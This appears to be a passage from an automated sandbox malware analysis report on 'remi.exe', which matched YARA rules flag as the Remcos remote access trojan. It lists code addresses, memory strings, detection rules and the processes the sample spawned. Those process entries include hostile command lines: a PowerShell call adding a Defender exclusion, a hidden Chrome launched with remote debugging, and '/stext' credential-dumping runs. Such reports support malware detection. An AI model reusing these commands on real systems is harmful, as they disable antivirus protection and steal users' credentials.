                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0041363116_2_00413631
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0044669016_2_00446690
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0044A73016_2_0044A730
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_004398D816_2_004398D8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_004498E016_2_004498E0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0044A88616_2_0044A886
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0043DA0916_2_0043DA09
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00438D5E16_2_00438D5E
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00449ED016_2_00449ED0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_0041FE8316_2_0041FE83
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00430F5416_2_00430F54
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_004050C217_2_004050C2
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_004014AB17_2_004014AB
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_0040513317_2_00405133
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_004051A417_2_004051A4
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_0040124617_2_00401246
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_0040CA4617_2_0040CA46
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_0040523517_2_00405235
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_004032C817_2_004032C8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_0040168917_2_00401689
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00402F6017_2_00402F60
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_011FD34419_2_011FD344
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_051A727819_2_051A7278
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_051A000619_2_051A0006
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_051A004019_2_051A0040
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_051A726A19_2_051A726A
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070C055919_2_070C0559
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070C056019_2_070C0560
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070C95E019_2_070C95E0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070C91A819_2_070C91A8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070CF05819_2_070CF058
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070CB0F019_2_070CB0F0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070CACA819_2_070CACA8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070CACB819_2_070CACB8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070C9A0919_2_070C9A09
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 19_2_070C9A1819_2_070C9A18
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 24_2_02BEF36224_2_02BEF362
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 24_2_02BED34424_2_02BED344
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 24_2_02BEB50824_2_02BEB508
                    Source: C:\Users\user\Desktop\remi.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Users\user\Desktop\remi.exeCode function: String function: 004020E7 appears 39 times
                    Source: C:\Users\user\Desktop\remi.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Users\user\Desktop\remi.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 1000A5A6 appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 1000B100 appears 33 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: String function: 00416760 appears 69 times
                    Source: remi.exe, 00000000.00000000.2109810551.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaYVs.exe@ vs remi.exe
                    Source: remi.exe, 00000000.00000002.2148771583.0000000007820000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs remi.exe
                    Source: remi.exe, 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs remi.exe
                    Source: remi.exe, 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs remi.exe
                    Source: remi.exe, 00000000.00000002.2150371712.0000000007E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs remi.exe
                    Source: remi.exe, 00000000.00000002.2135743456.000000000167E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs remi.exe
                    Source: remi.exe, 00000000.00000002.2138053725.0000000003261000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs remi.exe
                    Source: remi.exe, 00000006.00000002.2134015358.00000000012F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameaYVs.exe@ vs remi.exe
                    Source: remi.exeBinary or memory string: OriginalFilenameaYVs.exe@ vs remi.exe
                    Source: remi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: remi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: WinUpdate.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.remi.exe.7e60000.5.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.remi.exe.427e790.2.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.remi.exe.44190d8.3.raw.unpack, hLPFS2mMBxRY0UiRNB.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.remi.exe.44190d8.3.raw.unpack, hLPFS2mMBxRY0UiRNB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.remi.exe.44190d8.3.raw.unpack, hLPFS2mMBxRY0UiRNB.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.remi.exe.44190d8.3.raw.unpack, jmXER2MPEsTEDFIpqH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, jmXER2MPEsTEDFIpqH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, hLPFS2mMBxRY0UiRNB.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, hLPFS2mMBxRY0UiRNB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.remi.exe.7820000.4.raw.unpack, hLPFS2mMBxRY0UiRNB.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@91/235@29/13
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_2_00416AB7
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,6_2_0040E219
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,6_2_0041A63F
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_00419BC4
                    Source: C:\Users\user\Desktop\remi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\remi.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-E10MWO
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hi4ukhsb.zp5.ps1Jump to behavior
                    Source: remi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: remi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\Desktop\remi.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\remi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: WinUpdate.exe, WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: WinUpdate.exe, WinUpdate.exe, 00000010.00000002.2196738806.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: WinUpdate.exe, WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: WinUpdate.exe, WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: WinUpdate.exe, WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: WinUpdate.exe, 0000000F.00000002.2218440147.0000000002B1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: WinUpdate.exe, WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: remi.exeVirustotal: Detection: 57%
                    Source: remi.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\remi.exeFile read: C:\Users\user\Desktop\remi.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Users\user\Desktop\remi.exe "C:\Users\user\Desktop\remi.exe"
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe"
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\Desktop\remi.exe "C:\Users\user\Desktop\remi.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\Desktop\remi.exe "C:\Users\user\Desktop\remi.exe"
                    Source: C:\Users\user\Desktop\remi.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\zkuwzgocnnacbxcaejqamgtb"
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\beapzzzejvshdeqenuduxtnkcfqj"
